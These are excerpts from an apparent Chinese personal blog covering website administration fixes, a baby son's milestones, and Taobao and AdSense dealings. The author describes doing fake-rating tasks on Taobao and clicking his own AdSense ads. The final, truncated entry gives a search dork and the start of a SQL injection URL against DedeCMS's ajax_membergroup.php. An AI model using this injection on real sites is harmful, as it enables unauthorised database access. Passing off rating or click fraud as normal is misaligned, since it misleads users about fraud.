美食天下食谱站已经被百度K掉首页有一段时间了,这个网站都是采集的,有很长的一段时间也没有更新过,看到某个网站的主题很是漂亮,于是乎心生歹念,扒掉了它的皮,穿到了美食天下的身上。这皮也不是好穿的,幻灯片效果一直不能用,已经有文章设置成了幻灯+特荐,但是幻灯片的小图显示出来了,而大图一直都显示不了。从网上搜索了很久,也自己修改了几次,都不成啊。这不,今天找了老大,修改修改吧,等着看看吧!
已经在李亲顾订了一套百天照,还有张全家福的,就明天去了,程程变的越来越可爱,特别希望可以天天守在程程的身边,看他笑,看他哭,至少看到他的成长就是幸福的。等照片出来了上图!
把百度网盘里的文件共享给他人,想取消公开分享却不知道怎么取消了。经过仔细的研究,终于找到了解决办法:在百度网盘主页 - 公共文件(鼠标悬停到文件链接上) - 再点‘取消公开’ - OK很简单的哦。
在使用phpnow时,发现每次网站中获得的时间,都要比北京时间差8个小时,也可以说是早8个小时,经过研究,找到了最终的解决办法。①打开phpnow的安装目录,找到php的相关文件夹。②找到php-apache2handler.ini,打开文件然后搜索date.timezone ,可以看到结果所在行: 原代码: ;date.timezone = ...
话说小孩子真的是一天一个样,程程就是这样吧,说能逗笑就能逗笑了,说会吃手就会吃手了,这不程程刚刚三个月,说学会翻身就学会翻身了,这些绝对是天生的本能吧,无师自通!现在程程还不能完全的翻过去,但是已经能够侧着身子了,看看孩子翻来翻去的,我这当爸爸的那是相当的高兴啊!前些天称了下,程程已经11斤8两了,而且这小家伙不是像别的小孩特别的胖,眼睛很大,双眼皮,全都随他妈妈了。有时,他自己玩的很好,依依呀呀的,有的时候要有人陪他玩,弹弹电子琴啊,和他说话啊,给他唱歌啊,有时候呢就得抱着去房子外面,而且得立着抱,一平着抱就哭,一放在床上也哭,大人一坐下也哭,这小家伙的聪明程度是我们这些大人无法理解的...
打算将美食天下网站的百度联盟的账号单独的做一个,从现在的账号删除这个网站的时候,提示“您使用该网站域名注册了联盟产品,该网站不能直接删除,请您联系管理员进行删除操作”。百度之后发现了解决方法:解决方法要把此域名注册的产品都删除掉就可以了。点击:产品设置-计费网址设置,然后把“搜索推广合作 网盟推广合作”中你要删除的网址删除,再到“媒体管理”即可删除网址。这样就搞定了遇到的问题,之前将美食天下的全部广告位js化了,方面以后修改。
这几天,小胡一直在一个网站折腾,大麦户,淘宝刷钻平台,没有为自己的淘宝店刷,而是给别人刷,折腾了两天就感觉没啥意思了,首先,要准备出一定量的资金周转,然后,还要看发布任务的有多少,还有就是自己时间的多少哦了。刷了3天,接了20多个任务,才赚了31麦币(大麦户网站的接任务课可以得到的),如果自己刷淘宝信誉的话,可以在这个网站上折腾折腾,但是要想赚钱的话,我看还是算了,这赚钱太难了。前天网站在上午10点的多的时候就打不开了,刚开始小胡一直都不知道,知道后台去CNZZ看流量的时候才发现的问题,接着备份数据,将数据转移到了VPS上面,接着域名改解析,还原数据,但是访问域名的时候结果去到了默认的站...
前些天,淘宝由于发布违规商品被封,就因为一个商品,一个小软件,没有什么大用途,可能是传的图片违规了吧,还是淘宝的员工没有看清楚,还是商品的描述太露骨了,这可好,还是严重违规,被扣了12分,屏蔽店铺和商品12天,而且还要参加淘宝的违规考试,哎。今天搞定了淘宝的实名认证和违规考试,大概考试了6、7遍的样子,才通过了考试,84分,还是错了8道题的,不过还好过了,发布了几件商品,没有什么可卖的了,不对,其实还有。之前申请了至少有两次谷歌的adsense,第一次快到100刀的时候被封了,呵呵,都自己点击的。第二次,挂了之前账号的一个站,最后还是被封了,这次没有自己点,这一次,用小胡现在博客的域名申...
这两天小胡疯狂的再找php版本的淘宝客程序,最后找到一个基于thinkphp版本的,前台访问正常,但是后台访问却出现了Access denied for user 'root'@'localhost' (using password: YES)让小胡很是不解,明明已经正常安装了的,而且数据库配置文件/public/db.global.php已经做了修改。经过搜索,小胡发现:原因是由于这个系统是基于thinkphp开发的。 thinkphp的数据库连接文件是通过调用方式调用本身的数据库配置文件。 但是在安装thinkphp时候,没有自动更新thinkphp缓存,导致数据库连接信息没有更新。...
这里用百度去搜索下关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”获得使用DeDeCMS系统的网站。①注入漏洞:访问“/data/admin/ver.txt”页面获取系统最后升级时间然后访问/member/ajax_membergroup.php?action=post&membergroup=1页面,如果出现“朋友修改”则说明存在该漏洞。②然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `...